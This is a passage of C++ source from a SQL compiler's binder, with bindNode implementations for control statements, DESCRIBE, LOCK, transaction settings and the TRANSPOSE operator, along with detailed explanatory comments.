// TableDesc * td = bindWA->createTableDesc(naTable, corrName); if (! td || bindWA->errStatus()) return this; setTableDesc(td); if (bindWA->errStatus()) return this; } if (getProcAllParamsTree()) { ((ItemExpr *)getProcAllParamsTree())->convertToValueIdList(getProcAllParamsVids(), bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return this; // Clear the Tree since we now have gotten vids for all the parameters. setProcAllParamsTree(NULL); Lng32 sqlcode = 0; if (getProcAllParamsVids().entries() != numParams()) { sqlcode = -4067; // 4067 Explain/Statistics requires two operands, of type character. *CmpCommon::diags() << DgSqlCode(sqlcode) << DgString0(getTextForError()); bindWA->setErrStatus(); return NULL; } // type any param arguments to fixed char since runtime explain // expects arguments to be fixed char. Lng32 len = (Lng32)CmpCommon::getDefaultNumeric(VARCHAR_PARAM_DEFAULT_SIZE); SQLChar c(len); for (Lng32 i = 0; i < numParams(); i++) { getProcAllParamsVids()[i].coerceType(c, NA_CHARACTER_TYPE); if (getProcAllParamsVids()[i].getType().getTypeQualifier() != NA_CHARACTER_TYPE) { sqlcode = -4067; // 4067 Explain/Statistics requires two operands, of type character. *CmpCommon::diags() << DgSqlCode(sqlcode) << DgString0(getTextForError()); bindWA->setErrStatus(); return NULL; } const NAType &typ = getProcAllParamsVids()[i].getType(); CharInfo::CharSet chld_cs = ((const CharType&)typ).getCharSet(); ItemExpr *ie; if ( chld_cs == CharInfo::UNICODE ) { ie = new (bindWA->wHeap()) Translate( getProcAllParamsVids()[i].getItemExpr(), Translate::UNICODE_TO_ISO88591); ie = ie->bindNode(bindWA); getProcAllParamsVids()[i] = ie->getValueId(); } if (bindWA->errStatus()) return NULL; // For Explain and Statistics all parameters are inputs getProcInputParamsVids().insert(getProcAllParamsVids()); } // for } } // if return TableValuedFunction::bindNode(bindWA); } // ----------------------------------------------------------------------- // TableValuedFunction // ----------------------------------------------------------------------- RelExpr *TableValuedFunction::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // // Allocate an RETDesc and attach it to this and the BindScope. // setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, getTableDesc())); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // // Bind the base class. // RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; // // Assign the set of columns that belong to the virtual table // as the output values that can be produced by this node. // getGroupAttr()->addCharacteristicOutputs(getTableDesc()->getColumnList()); return boundExpr; } // TableValuedFunction::bindNode() // ----------------------------------------------------------------------- // Member functions for classes Control* // must be written allowing for a NULL BindWA to be passed in! // // This happens when called from the SQLC/SQLCO Preprocessor, // which needs to bind certain "static-only" statements -- // those which evaluate to STATIC_ONLY_WITH_WORK_FOR_PREPROCESSOR -- // see ControlAbstractClass::isAStaticOnlyStatement(). // ----------------------------------------------------------------------- RelExpr * ControlAbstractClass::bindNode(BindWA *bindWA) { if (nodeIsBound()) return this; // Early return if called by SQLC/SQLCO Preprocessor if (!bindWA) return this; // Allocate an empty RETDesc and attach it to this node and the BindScope. setRETDesc(new(bindWA->wHeap()) RETDesc(bindWA)); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return bindSelf(bindWA); } // ControlAbstractClass::bindNode() RelExpr * ControlQueryShape::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // remember the required shape in the control table if (alterArkcmpEnvNow()) { if (getShape()) ActiveControlDB()->setRequiredShape(this); else { // no shape passed in. Hold or Restore. if (holdShape()) ActiveControlDB()->saveCurrentCQS(); else ActiveControlDB()->restoreCurrentCQS(); if (ActiveControlDB()->getRequiredShape()) ActiveControlDB()->getRequiredShape()->holdShape() = holdShape(); } } return ControlAbstractClass::bindNode(bindWA); } // ControlQueryShape::bindNode() RelExpr * ControlQueryDefault::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Alter the current Defaults settings if this is a static CQD. // // "AffectYourself" is coming to you courtesy of the Staple Singers: // 'Affect yourself, na na na, na na na na, affect yourself, re re re re.' // It's neat to find such Binder-relevant lyrics, eh? // NABoolean affectYourself = alterArkcmpEnvNow(); assert(!bindWA || bindWA->getSchemaDB() == ActiveSchemaDB()); NADefaults &defs = ActiveSchemaDB()->getDefaults(); defs.setState(NADefaults::SET_BY_CQD); if ( defs.isReadonlyAttribute(token_) == TRUE ) { Int32 attrNum = defs.lookupAttrName(token_); if (stricmp(value_, defs.getValue(attrNum)) != 0 ) { if (CmpCommon::getDefault(DISABLE_READ_ONLY) == DF_OFF) { if (bindWA) bindWA->setErrStatus(); *CmpCommon::diags() << DgSqlCode(-4130) << DgString0(token_); return NULL; } } } if (holdOrRestoreCQD_ == 0) { attrEnum_ = affectYourself ? defs.validateAndInsert(token_, value_, reset_) : defs.validate (token_, value_, reset_); if (attrEnum_ < 0) { if (bindWA) bindWA->setErrStatus(); return NULL; } // remember this control in the control table if (affectYourself) ActiveControlDB()->setControlDefault(this); } else if ((holdOrRestoreCQD_ > 0) && (affectYourself)) { attrEnum_ = defs.holdOrRestore(token_, holdOrRestoreCQD_); if (attrEnum_ < 0) { if (bindWA) bindWA->setErrStatus(); return NULL; } } return ControlAbstractClass::bindNode(bindWA); } // ControlQueryDefault::bindNode() RelExpr * ControlTable::bindNode(BindWA *bindWA) { if (nodeIsBound()) return this; CMPASSERT(bindWA); // can't handle it yet if called from SQLC Preprocessor // remember this control in the control table tableName_->applyDefaults(bindWA, bindWA->getDefaultSchema()); NABoolean ok = alterArkcmpEnvNow() ? ActiveControlDB()->setControlTableValue(this) : ActiveControlDB()->validate(this); if (NOT ok) { if (bindWA) bindWA->setErrStatus(); return NULL; } return ControlAbstractClass::bindNode(bindWA); } // ControlTable::bindNode() RelExpr * ControlSession::bindNode(BindWA *bindWA) { if (nodeIsBound()) return this; // remember this control in the control session NABoolean ok = alterArkcmpEnvNow() ? ActiveControlDB()->setControlSessionValue(this) : ActiveControlDB()->validate(this); if (NOT ok) { if (bindWA) bindWA->setErrStatus(); return NULL; } return ControlAbstractClass::bindNode(bindWA); } // ControlSession::bindNode() RelExpr * SetSessionDefault::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } if (getOperatorType() == REL_SET_SESSION_DEFAULT) { // trim leading and trailing spaces from token_ and value_ // and upcase token token_ = token_.strip(NAString::both); value_ = value_.strip(NAString::both); token_.toUpper(); // TBD: perhaps add a component privilege that allows others // to set parserflags if ((token_ == "SET_PARSERFLAGS") || (token_ == "RESET_PARSERFLAGS")) { if (!ComUser::isRootUserID()) { *CmpCommon::diags() << DgSqlCode(-1017); bindWA->setErrStatus(); return this; } } } return ControlAbstractClass::bindNode(bindWA); } // SetSessionDefault::bindNode() // ----------------------------------------------------------------------- // member function for class RelSetTimeout // ----------------------------------------------------------------------- RelExpr * RelSetTimeout::bindNode(BindWA *bindWA) { if (nodeIsBound()) return this; // Allocate an empty RETDesc and attach it to this node and the BindScope. setRETDesc(new(bindWA->wHeap()) RETDesc(bindWA)); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); if (timeoutValueExpr_) { // bind the timeout-value expression timeoutValueExpr_->bindNode(bindWA); if (bindWA->errStatus()) return this; } if ( ! strcmp("*", userTableName_.getCorrNameAsString()) ) isForAllTables_ = TRUE ; HostVar *proto = userTableName_.getPrototype() ; // Check for the not-supported "SET STREAM TIMEOUT" on a specific stream if ( isStream_ && ! isForAllTables_ ) { *CmpCommon::diags() << DgSqlCode(-3187); bindWA->setErrStatus(); return this; } if ( isForAllTables_ ) { /* do nothing */ } else if ( proto ) { // it is a HOSTVAR or DEFINE userTableName_.applyDefaults(bindWA, bindWA->getDefaultSchema()); CMPASSERT ( proto->isPrototypeValid() ) ; userTableName_.getPrototype()->bindNode(bindWA); } else { // i.e., an explicit table name was specified // Get the NATable for this table. NATable *naTable = bindWA->getNATable(userTableName_, FALSE); if (bindWA->errStatus()) return this; // e.g. error: table does not exist if ( naTable->getViewText() ) { // can not set lock timeout on a view *CmpCommon::diags() << DgSqlCode(-3189); bindWA->setErrStatus(); return this; } // Extract and keep the physical file name const NAFileSet * clstInd = naTable->getClusteringIndex() ; setPhysicalFileName( clstInd->getFileSetName().getQualifiedNameAsString().data() ); } // Bind the base class. return bindSelf(bindWA); } // ----------------------------------------------------------------------- // member functions for class Describe // (see sqlcomp/CmpDescribe.cpp for execution of the request) // ----------------------------------------------------------------------- RelExpr *Describe::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // SHOWCONTROL DEFAULT "magic string"; -- see ShowSchema.h and ExSqlComp.cpp if (getFormat() == CONTROL_DEFAULTS_) { if (getDescribedTableName().getQualifiedNameObj().getObjectName() == ShowSchema::ShowControlDefaultSchemaMagic()) { // Return info in an error message (a warning msg doesn't cut it). const SchemaName &catsch = bindWA->getDefaultSchema(); NAString cat(catsch.getCatalogNameAsAnsiString(),bindWA->wHeap()); NAString sch(catsch.getUnqualifiedSchemaNameAsAnsiString(),bindWA->wHeap()); // if (SqlParser_NAMETYPE == DF_NSK) { // LCOV_EXCL_START - nsk // The cat & sch from the BindWA are really from MPLOC. // Get the real ANSI cat & sch, prepending them to the strings // and put the MPLOC info in parens. const SchemaName &csAnsi = ActiveSchemaDB()->getDefaultSchema(); NAString cAnsi(csAnsi.getCatalogNameAsAnsiString(),bindWA->wHeap()); NAString sAnsi(csAnsi.getUnqualifiedSchemaNameAsAnsiString(),bindWA->wHeap()); cat.prepend(cAnsi + " ("); cat += ")"; sch.prepend(sAnsi + " ("); sch += ")"; // LCOV_EXCL_STOP } *CmpCommon::diags() << DgSqlCode(-ABS(ShowSchema::DiagSqlCode())) << DgCatalogName(cat) << DgSchemaName (sch); bindWA->setErrStatus(); return this; } if (getDescribedTableName().getQualifiedNameObj().getObjectName() == GetControlDefaults::GetExternalizedDefaultsMagic()) { // Return info in an error message (a warning msg doesn't cut it). NAString cqdPairs(bindWA->wHeap()); size_t lenN, lenV; char lenbufN[10], lenbufV[10]; const char *nam, *val; NADefaults &defs = bindWA->getSchemaDB()->getDefaults(); for (CollIndex i = 0; i < defs.numDefaultAttributes(); i++ ) { if (defs.getCurrentDefaultsAttrNameAndValue(i, nam, val, TRUE)) { lenN = strlen(nam); lenV = strlen(val); CMPASSERT(lenN <= 999 && lenV <= 999); // %3d coming up next sprintf(lenbufN, "%3d", (UInt32)lenN); sprintf(lenbufV, "%3d", (UInt32)lenV); cqdPairs += NAString(lenbufN) + nam + lenbufV + val; } } *CmpCommon::diags() << DgSqlCode(-ABS(GetControlDefaults::DiagSqlCode())) << DgString0(cqdPairs); bindWA->setErrStatus(); return this; } } // Create a descriptor for a virtual table to look like this: // // CREATE TABLE DESCRIBE__ (DESCRIBE__COL VARCHAR(3000) NOT NULL); // For SeaQuest Unicode: // CREATE TABLE DESCRIBE__ (DESCRIBE__COL VARCHAR(3000 BYTES) CHARACTER SET UTF8 NOT NULL); // #define MAX_DESCRIBE_LEN 3000 // e.g., SQL/MP Views.ViewText column // readtabledef_allocate_desc requires that HEAP (STMTHEAP) be used for new's! desc_struct * table_desc = readtabledef_allocate_desc(DESC_TABLE_TYPE); table_desc->body.table_desc.tablename = new HEAP char[strlen("DESCRIBE__")+1]; strcpy(table_desc->body.table_desc.tablename, "DESCRIBE__"); // see nearly identical code below for indexes file desc desc_struct * files_desc = readtabledef_allocate_desc(DESC_FILES_TYPE); table_desc->body.table_desc.files_desc = files_desc; files_desc->body.files_desc.fileorganization = KEY_SEQUENCED_FILE; Lng32 colnumber = 0, offset = 0; desc_struct * column_desc = readtabledef_make_column_desc( table_desc->body.table_desc.tablename, "DESCRIBE__COL", colnumber, // INOUT REC_BYTE_V_ASCII, MAX_DESCRIBE_LEN, offset); // INOUT column_desc->body.columns_desc.character_set = CharInfo::UTF8; column_desc->body.columns_desc.encoding_charset = CharInfo::UTF8; table_desc->body.table_desc.colcount = colnumber; table_desc->body.table_desc.record_length = offset; desc_struct * index_desc = readtabledef_allocate_desc(DESC_INDEXES_TYPE); index_desc->body.indexes_desc.tablename = table_desc->body.table_desc.tablename; index_desc->body.indexes_desc.indexname = table_desc->body.table_desc.tablename; index_desc->body.indexes_desc.ext_indexname = table_desc->body.table_desc.tablename; index_desc->body.indexes_desc.keytag = 0; // primary index index_desc->body.indexes_desc.record_length = table_desc->body.table_desc.record_length; index_desc->body.indexes_desc.colcount = table_desc->body.table_desc.colcount; index_desc->body.indexes_desc.blocksize = 4096; // anything > 0 // Cannot simply point to same files desc as the table one, // because then ReadTableDef::deleteTree frees same memory twice (error) desc_struct * i_files_desc = readtabledef_allocate_desc(DESC_FILES_TYPE); index_desc->body.indexes_desc.files_desc = i_files_desc; i_files_desc->body.files_desc.fileorganization = KEY_SEQUENCED_FILE; desc_struct * key_desc = readtabledef_allocate_desc(DESC_KEYS_TYPE); key_desc->body.keys_desc.indexname = index_desc->body.indexes_desc.indexname; key_desc->body.keys_desc.keyseqnumber = 1; key_desc->body.keys_desc.tablecolnumber = 0; key_desc->body.keys_desc.ordering= 0; index_desc->body.indexes_desc.keys_desc = key_desc; table_desc->body.table_desc.columns_desc = column_desc; table_desc->body.table_desc.indexes_desc = index_desc; // // Get the NATable for this object. // CorrName corrName("DESCRIBE__"); corrName.setSpecialType(ExtendedQualName::VIRTUAL_TABLE); NATable *naTable = bindWA->getNATable(corrName, FALSE/*CatBind*/, table_desc); if (bindWA->errStatus()) return this; // // Allocate a TableDesc (which is not the table_desc we just constructed) // and attach it to the Scan node. // setTableDesc(bindWA->createTableDesc(naTable, corrName)); if (bindWA->errStatus()) return this; // // Allocate an RETDesc and attach it to the Scan node and the BindScope. // setRETDesc(new (bindWA->wHeap()) RETDesc(bindWA, getTableDesc())); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // // Bind the described table CorrName member, the children, and the base class. // if (! describedTableName_.getQualifiedNameObj().getObjectName().isNull()) { if ((getFormat() >= CONTROL_FIRST_) && (getFormat() <= CONTROL_LAST_)) { describedTableName_.applyDefaults(bindWA, bindWA->getDefaultSchema()); } else { // do not override schema for showddl bindWA->setToOverrideSchema(FALSE); // if this is a showlabel command on a resource fork, // but the describedTableName // is not a fully qualified rfork name, then get the rfork name // for the specified table. if ((getFormat() == Describe::LABEL_) && (describedTableName_.getSpecialType() == ExtendedQualName::RESOURCE_FORK) && (describedTableName_.getLocationName().isNull())) { describedTableName_.setSpecialType(ExtendedQualName::NORMAL_TABLE); NATable *naTable = bindWA->getNATable(describedTableName_); if (NOT bindWA->errStatus()) { // replace the describedTableName with its rfork name. describedTableName_.setSpecialType(ExtendedQualName::RESOURCE_FORK); NAString rforkName = naTable->getClusteringIndex()->getFileSetName().getQualifiedNameAsString(); char * rforkNameData = (char*)(rforkName.data()); rforkNameData[rforkName.length()-1] += 1; describedTableName_.setLocationName(rforkName); } } // check if we need to consider public schema before // describedTableName_ is qualified by getNATable if (describedTableName_.getQualifiedNameObj().getSchemaName().isNull()) setToTryPublicSchema(TRUE); bindWA->getNATable(describedTableName_); if (bindWA->errStatus()) { // if volatile related error, return it. // Otherwise, clear diags and let this error be caught // when describe is executed. if ((CmpCommon::diags()->mainSQLCODE() == -4190) || (CmpCommon::diags()->mainSQLCODE() == -4191) || (CmpCommon::diags()->mainSQLCODE() == -4192) || (CmpCommon::diags()->mainSQLCODE() == -4193) || (CmpCommon::diags()->mainSQLCODE() == -4155) || // define not supported (CmpCommon::diags()->mainSQLCODE() == -4086) || // catch Define Not Found error (CmpCommon::diags()->mainSQLCODE() == -30044)) // default schema access error return this; CmpCommon::diags()->clear(); bindWA->resetErrStatus(); } } if (pUUDFName_ NEQ NULL AND NOT pUUDFName_->getObjectName().isNull()) { pUUDFName_->applyDefaults(bindWA->getDefaultSchema()); } } bindChildren(bindWA); RelExpr *boundExpr = bindSelf(bindWA); if (bindWA->errStatus()) return boundExpr; // // Assign the set of columns that belong to the table to be scanned // as the output values that can be produced by this scan. // getGroupAttr()->addCharacteristicOutputs(getTableDesc()->getColumnList()); return boundExpr; } // Describe::bindNode() // ----------------------------------------------------------------------- // member functions for class RelLock // ----------------------------------------------------------------------- RelExpr * RelLock::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // do not do override schema for this bindWA->setToOverrideSchema(FALSE); // Get the NATable for this object. NATable *naTable = bindWA->getNATable(getTableName()); if (bindWA->errStatus()) return this; NABoolean isView = !!naTable->getViewText(); if (isView && !naTable->isAnMV()) { *CmpCommon::diags() << DgSqlCode(-4222) << DgString0("Views"); bindWA->setErrStatus(); return this; } else { baseTableNameList_.insert((CorrName *)getPtrToTableName()); } Int32 locSpec = 0; NAString tabNames(bindWA->wHeap()); for (CollIndex i = 0; i < baseTableNameList_.entries(); i++) { naTable = bindWA->getNATable(*baseTableNameList_[i]); if (bindWA->errStatus()) return this; // Genesis 10-990212-6908: // Ignore the user-specified correlation name -- // use just the 3-part tblname (and any LOCATION clause, etc). // Then, insert only unique names into tabIds_ -- // to prevent XTNM duplicates (errmsg 4056) // when multiple layered views reference the same table or corr-name. CorrName bt(*baseTableNameList_[i]); bt.setCorrName(""); NABoolean haveTDforThisBT = FALSE; for (CollIndex j = 0; j < tabIds_.entries(); j++) { if (bt == tabIds_[j]->getCorrNameObj()) { haveTDforThisBT = TRUE; break; } } if (!haveTDforThisBT) { if (bt.isLocationNameSpecified()) locSpec++; tabNames += NAString(", ") + bt.getQualifiedNameObj().getQualifiedNameAsAnsiString(); tabIds_.insert(bindWA->createTableDesc(naTable, bt)); if (bindWA->errStatus()) return this; } } if (tabIds_.entries() > 1) { CMPASSERT(locSpec == 0); tabNames.remove(0, 2); // remove leading ", " // Warning 4124: More than one table will be locked: $0~String0. // (warning, so user realizes the effects of this command // when run on a view which joins tables...). *CmpCommon::diags() << DgSqlCode(+4124) << DgString0(tabNames); } if ((isView) || (tabIds_.entries() > 1) || (baseTableNameList_.entries() > 1) || (CmpCommon::getDefault(ATTEMPT_ESP_PARALLELISM) == DF_OFF)) { parallelExecution_ = FALSE; } // Allocate an empty RETDesc and attach it to this node and the BindScope. setRETDesc(new(bindWA->wHeap()) RETDesc(bindWA)); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); // Bind the base class. return bindSelf(bindWA); } // RelLock::bindNode() // ----------------------------------------------------------------------- // member functions for class RelTransaction // ----------------------------------------------------------------------- RelExpr * RelTransaction::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } // Allocate an empty RETDesc and attach it to this node and the BindScope. setRETDesc(new(bindWA->wHeap()) RETDesc(bindWA)); bindWA->getCurrentScope()->setRETDesc(getRETDesc()); if (diagAreaSizeExpr_) { diagAreaSizeExpr_->bindNode(bindWA); if (bindWA->errStatus()) return this; } // "mode_" is NULL if BEGIN/COMMIT/ROLLBACK WORK, nonNULL if SET TRANSACTION. if (mode_) { if ((mode_->autoCommit() != TransMode::AC_NOT_SPECIFIED_) || (mode_->getAutoBeginOn() != 0) || (mode_->getAutoBeginOff() != 0)) { CMPASSERT(mode_->isolationLevel() == TransMode::IL_NOT_SPECIFIED_ && mode_->accessMode() == TransMode::AM_NOT_SPECIFIED_); } else { // See Ansi 14.1, especially SR 4. // Similar code must be maintained in // comexe/ExControlArea::addControl() and NADefaults::validateAndInsert(). // SET TRANSACTION w/o specifying ISOLATION LEVEL reverts TransMode to // the NADefaults setting of ISOLATION_LEVEL // (which the user should set to SERIALIZABLE if they want // SET TRANSACTION to be Ansi conformant). if (mode_->isolationLevel() == TransMode::IL_NOT_SPECIFIED_) { if (CmpCommon::getDefault(ISOLATION_LEVEL_FOR_UPDATES) == DF_NONE) bindWA->getSchemaDB()->getDefaults().getIsolationLevel( mode_->isolationLevel()); // short int else bindWA->getSchemaDB()->getDefaults().getIsolationLevel( mode_->isolationLevel(), // short int CmpCommon::getDefault(ISOLATION_LEVEL_FOR_UPDATES)); } if (mode_->accessMode() == TransMode::AM_NOT_SPECIFIED_) mode_->updateAccessModeFromIsolationLevel( mode_->getIsolationLevel()); // enum // 3114 Transaction access mode RW is incompatible with isolation level RU if (mode_->accessMode() == TransMode::READ_WRITE_ && mode_->isolationLevel() == TransMode::READ_UNCOMMITTED_) { *CmpCommon::diags() << DgSqlCode(-3114); bindWA->setErrStatus(); return this; } if (mode_->rollbackMode() == TransMode::ROLLBACK_MODE_NOT_SPECIFIED_) mode_->rollbackMode() = TransMode::ROLLBACK_MODE_WAITED_ ; // 4352 - if (mode_->multiCommit() == TransMode::MC_ON_) { if (mode_->invalidMultiCommitCompatibility()) { *CmpCommon::diags() << DgSqlCode(-4352); bindWA->setErrStatus(); return this; } } } } // SET TRANSACTION stmt // Bind the base class. return bindSelf(bindWA); } // Transpose::bindNode - Bind the transpose node. // Coming into the node (from the parser) there are two ItemExpr Trees: // // keyCol_: The ItemExpr contains a ColReference to the key column which // is added by the transpose node. This pointer ia set to NULL by bindNode. // If keyCol_ is NULL coming into the bindNode, then no key Column is // generated for this transpose. // // transValsTree_: This ItemExpr tree contains a list of pairs which is // NULL terminated (for ease of processing). Each pair contains in child(0), // a list of transpose items for a given transpose set and in child(1), a // list of ColReferences to the new value columns associated with this // transpose set. A transpose item is a list of value expressions. // This pointer is set to NULL by bindNode. // // For Example: // // SELECT * // FROM Table // TRANSPOSE A,B AS C1 // X,Y,Z as C2 // (1,'hello'),(2,'world') AS (C3, C4) // KEY BY K1 // // For the above query, after parsing, the TRANSPOSE node will look like: // // TRANSPOSE // keyCol_ transValsTree_ // | | // K1 O------O---------O---NULL // | | | // O O O--O // |\ |\ | |\ // O C1 O C2 | C3 C4 // |\ |\ O---------O---NULL // A O X O | | // |\ |\ O O // B NULL Y O |\ |\ // |\ 1 'hello' 2 'world' // Z NULL // // O - represent ITM_LIST nodes. // // bindNode binds this structure to form a new structure contained in // the vector of ValueIdLists, transUnionVector_. // // transUnionVector_: This is a vector of ValueIdLists. There is one entry // for each transpose set, plus one entry for the key values. Each entry // contains a list of ValueIdUnion Nodes. The first entry contains a list // with one ValueIdUnion node. This node is for the Const. Values (1 - N) // representing the Key Values. The other entries contain lists of // ValueIdUnion nodes for the Transposed Values. Each of these entries of // the vector represent a transpose set. If the transpose set contains a // list of values, then there will be only one ValueIdUnion node in the // list. If the transpose set contains a list of lists of values, then // there will be as many ValueIdUnion nodes as there are items in the // sublists. (see example below.) // transUnionVector_ is generated in bindNode(). // // transUnionVectorSize_: This is the number of entries in transUnionVector_. // // For the above query, after binding, the TRANSPOSE node will look like: // // TRANSPOSE // transUnionVectorSize_: 4 // transUnionVector_: // ValueIdUnion(1,2,3,4,5,6,7) // ValueIdUnion(A,B) // ValueIdUnion(X,Y,Z) // ValueIdUnion(1,2) , ValueIdUnion('hello','world') // // RelExpr *Transpose::bindNode(BindWA *bindWA) { // If this node has already been bound, we are done. // if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } BindContext *curContext = bindWA->getCurrentScope()->context(); curContext->inTransposeClause() = TRUE; // Bind the child nodes. // bindChildren(bindWA); if (bindWA->errStatus()) return this; // At this point the Transpose relational operator has two or three // expressions: // keyCol_ --- A ColReference to the new keyCol. (possibly NULL) // transValsTree_ --- expressions for the transposed values and their // ColReferences. // // transpose::bindNode() performs the following steps: // // 1 - Construct a list of transpose set expressions // and a list of ColReferences associated with each transpose set // expression. // // 2 - Allocate a return descriptor and add the columns from the // childs descriptor to it. // // 3 - Allocate the transUnionVector_ // // 4 - Construct a ValueIdUnion node for the Key Values. Bind this node. // Add the keyColName to the return descriptor with the valueId of this // node. Add the valueId of this node as the first entry of // a ValueIdList in the first entry of transUnionVector_. // // 5 - For each transpose set, Construct as many ValueIdUnion nodes as // there are values in each item of the transpose set. Within a // given transpose set, the number of values per item must be the // same. In the example above, the third transpose set contains the // items (1, 'hello') and (2, 'world'). These both have two values per // item. The others all have 1 value per item. The ValueIdUnions // generated will contain the i'th value from each item. Bind each // of these ValueUnionId nodes. Add the value column name to the // return descriptor with the valueId of this node. Add the valueId // of this node the ValueIdList in the proper entry of // transUnionVector_. // // 6 - Set the return descriptor, and bindSelf. // CollIndex i, j, k; CollIndex numTransSets = 0; // Get a pointer to the head of this list of pairs. // This is the last time we will have to reference this tree. // ItemExpr *transTree = (ItemExpr *)removeTransValsTree(); // Allocate two ItemExpr Lists. One for the list of lists of (lists of) // expressions. And the other for the list of (lists of) ColReferences. // ItemExprList transSetsList(bindWA->wHeap()); ItemExprList newColsList(bindWA->wHeap()); // Populate these lists and // determine how many transpose sets there are in this tree. // In the example above, there should be three. // while (transTree) { transSetsList.insert(transTree->child(0)->child(0)); newColsList.insert(transTree->child(0)->child(1)); numTransSets++; transTree = transTree->child(1); } // Must have at least one value expression in the transpose values list. // CMPASSERT(numTransSets > 0); // Using the example above, at this point: // // transSetsList newColsList // | | | | | | // O O O---------O---NULL C1 C2 O // |\ |\ | | |\ // A O X O O O C3 C4 // |\ |\ |\ |\ // B NULL Y O 1 'hello' 2 'world' // |\ // Z NULL // // Allocate the return descriptor. This will contain the // columns of the child node as well as the new columns added // by the transpose operator. The column order is: // // [childs columns][keyCol][valCol1][valCol2] ... // // Using the example, this would be: // // [childs columns], K1, C1, C2, C3, C4 // RETDesc *resultTable = new(bindWA->wHeap()) RETDesc(bindWA); // Add the columns from the child to the RETDesc. // const RETDesc &childTable = *child(0)->getRETDesc(); resultTable->addColumns(bindWA, childTable); transUnionVectorSize_ = numTransSets + 1; transUnionVector() = new(bindWA->wHeap()) ValueIdList[transUnionVectorSize_]; // Get the key column reference // This is the last time we need this ItemExpr. // ColReference *keyColumn = (ColReference *)removeKeyCol(); // If no key column has been specified, then no key col will be // generated. // if (keyColumn) { //Get the key column name. // NAString keyColName(keyColumn->getColRefNameObj().getColName(), bindWA->wHeap()); // Construct and Bind the ValueIdUnion node as the union of constants // from 1 to the total number of transpose expressions. In the above // example this will be from 1 to 9, since there are 3 transpose sets // and each set has 3 expressions. // ValueIdList constVals; ItemExpr *constExpr; CollIndex keyVal; // For each expression in each transpose set. // for (i = 0, keyVal = 1; i < numTransSets; i++) { // Determine how many expressions are in each transpose set. // CollIndex numTransItems = 0; ItemExpr *transSet = transSetsList[i]; while (transSet) { numTransItems++; transSet = transSet->child(1); } for (j = 0; j < numTransItems; j++, keyVal++) { // Construct the constant value // #pragma nowarn(1506) // warning elimination constExpr = new(bindWA->wHeap()) SystemLiteral(keyVal); #pragma warn(1506) // warning elimination // Bind the constant value. // constExpr->bindNode(bindWA); if (bindWA->errStatus()) return this; // Insert the valueId into the list // constVals.insert(constExpr->getValueId()); } } // Construct the ValueIdUnion node which will represent the key Col. // ValueIdUnion *keyVidu = new(bindWA->wHeap()) ValueIdUnion(constVals, NULL_VALUE_ID); // Bind the ValueIdUnion node. // keyVidu->bindNode(bindWA); if (bindWA->errStatus()) return this; // Add the key column to the RETDesc (as the union of all the constants) // resultTable->addColumn(bindWA, keyColName, keyVidu->getValueId()); // The ValueIdUnion for the Key Values is the first entry in // the ValueIdList of the first entry of transUnionVector_. // transUnionVector()[0].insert(keyVidu->getValueId()); } // For each transpose set, // - bind the list of expressions. // - Construct a ValueIdUnion node containing the resulting valueIds. // - Bind this ValueIdUnion node // - Add the associate column name to the return descriptor with the // valueId of the ValueIdUnion node. // ValueIdList transVals; for (i = 0; i < numTransSets; i++) { // The column(s) associated with this transpose set. // (will be used below, within the inner loop) // ItemExprList newCols(newColsList[i], bindWA->wHeap()); // Determine how many expressions are in each transpose set. // CollIndex numTransItems = 0; ItemExpr *transSet = transSetsList[i]; ItemExprList transItemList(bindWA->wHeap()); // Populate this list. // while (transSet) { transItemList.insert(transSet->child(0)); numTransItems++; transSet = transSet->child(1); } ItemExprList transItem(transItemList[0], bindWA->wHeap()); CollIndex numTransVals = transItem.entries(); // For a given transpose set, the number of new columns declared // must be the same as the number of items per value. In the example // above, the third transpose set contains the items (1, 'hello') and // the columns (C3,C4) both have two entries. // if (numTransVals != newCols.entries()) { *CmpCommon::diags() << DgSqlCode(-4088); bindWA->setErrStatus(); return this; } for (k = 0; k < numTransVals; k++) { ItemExpr *transValueUnionExpr = NULL; for (j = 0; j < numTransItems; j++) { transItem.clear(); transItem.insertTree(transItemList[j], ITM_ITEM_LIST); // Within a given transpose set, the number of values per item // must be the same. In the example above, the third transpose // set contains the items (1, 'hello') and (2, 'world'). These // both have two values per item. The others all have 1 value // per item. // if (numTransVals != transItem.entries()) { *CmpCommon::diags() << DgSqlCode(-4088); bindWA->setErrStatus(); return this; } if (transValueUnionExpr == NULL) { transValueUnionExpr = transItem[k]; } else { transValueUnionExpr = new (bindWA->wHeap()) ItemList(transValueUnionExpr, transItem[k]); } } // Bind the Transpose Values expressions. Get the expression value Id's // transVals.clear(); if(transValueUnionExpr != NULL ) transValueUnionExpr->convertToValueIdList(transVals, bindWA, ITM_ITEM_LIST); if (bindWA->errStatus()) return this; // If there are more than one transpose set, the value columns // generated by transpose can be NULL. So, make sure the typing is // done properly. This is done by setting the first in the list to // be nullable, then the ValueIdUnion will be nullable and the new // column will be nullable. This is not done on the ValueIdUnion // node itself, since it will add an Null Instantiate node, and // we later assume that this node will always be a ValueIdUnion // node. // if (numTransSets > 1) { ValueId valId = transVals[0]; transVals[0] = valId.nullInstantiate(bindWA, FALSE); } // Construct and Bind the ValueIdUnion node for the transpose vals. // ValueIdUnion *valVidu = new(bindWA->wHeap()) ValueIdUnion(transVals, 